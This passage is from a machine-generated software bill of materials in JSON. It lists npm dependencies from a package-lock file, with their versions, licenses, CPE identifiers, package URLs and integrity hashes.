"de6527b74c32bd7a","name":"actions/setup-node","version":"v4","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/reusify/.github/workflows/ci.yml","accessPath":"/node_modules/reusify/.github/workflows/ci.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v4","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v4"}},{"id":"12d1ed2dd95a1a7c","name":"agent-base","version":"6.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/agent-base@6.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz","integrity":"sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==","dependencies":{"debug":"4"}}},{"id":"f7259be6132b188d","name":"agent-base","version":"7.1.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/agent-base@7.1.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz","integrity":"sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==","dependencies":null}},{"id":"434b3315d409487e","name":"ansi-regex","version":"5.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/ansi-regex@5.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz","integrity":"sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==","dependencies":null}},{"id":"351fe1b55f0afa57","name":"ansi-regex","version":"6.2.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/ansi-regex@6.2.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz","integrity":"sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==","dependencies":null}},{"id":"d7348151a8592cc2","name":"ansi-styles","version":"4.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ansi-styles@4.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz","integrity":"sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==","dependencies":{"color-convert":"^2.0.1"}}},{"id":"b7d3f8e2ee8c8206","name":"ansi-styles","version":"6.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ansi-styles@6.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz","integrity":"sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==","dependencies":null}},{"id":"dc69ebae19192ee6","name":"any-promise","version":"1.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/any-promise@1.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz","integrity":"sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==","dependencies":null}},{"id":"0f1f6d6adbfca65a","name":"anymatch","version":"3.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/anymatch@3.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz","integrity":"sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==","dependencies":{"normalize-path":"^3.0.0","picomatch":"^2.0.4"}}},{"id":"02ed6bf0c016d0d3","name":"append-field","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/append-field@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz","integrity":"sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==","dependencies":null}},{"id":"c190b80836cef557","name":"arg","version":"5.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/arg@5.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/arg/-/arg-5.0.2.tgz","integrity":"sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==","dependencies":null}},{"id":"f61b69e470287928","name":"array-flatten","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/array-flatten@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz","integrity":"sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==","dependencies":null}},{"id":"e733388ffa39ebc5","name":"arrify","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/arrify@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz","integrity":"sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==","dependencies":null}},{"id":"3f1747f861c5fded","name":"async-retry","version":"1.3.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/async-retry@1.3.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz","integrity":"sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==","dependencies":{"retry":"0.13.1"}}},{"id":"3f371bd1625a90e5","name":"asynckit","version":"0.4.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/asynckit@0.4.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz","integrity":"sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==","dependencies":null}},{"id":"9d0845c4768cfcf5","name":"autoprefixer","version":"10.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/autoprefixer@10.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz","integrity":"sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong==","dependencies":{"browserslist":"^4.28.2","caniuse-lite":"^1.0.30001787","fraction.js":"^5.3.4","picocolors":"^1.1.1","postcss-value-parser":"^4.2.0"}}},{"id":"691f5259c0d155d0","name":"axios","version":"1.15.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/axios@1.15.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/axios/-/axios-1.15.2.tgz","integrity":"sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A==","dependencies":{"follow-redirects":"^1.15.11","form-data":"^4.0.5","proxy-from-env":"^2.1.0"}}},{"id":"0d7c80c1e227b7e2","name":"balanced-match","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/balanced-match@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz","integrity":"sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==","dependencies":null}},{"id":"b2d621b6dd16cf05","name":"base64-js","version":"0.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/base64-js@0.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz","integrity":"sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw==","dependencies":null}},{"id":"c7ab39b9720e240f","name":"base64-js","version":"1.5.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/base64-js@1.5.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz","integrity":"sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==","dependencies":null}},{"id":"224462b6727019f7","name":"base64id","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/base64id@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz","integrity":"sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==","dependencies":null}},{"id":"013c8659dba6bad8","name":"baseline-browser-mapping","version":"2.10.24","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/baseline-browser-mapping@2.10.24","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz","integrity":"sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA==","dependencies":null}},{"id":"3e5df9b4f6b62db4","name":"basic-auth","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/basic-auth@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz","integrity":"sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==","dependencies":{"safe-buffer":"5.1.2"}}},{"id":"06243f2e41cd3912","name":"bcryptjs","version":"2.4.3","type":"npm","foundBy":"javascript-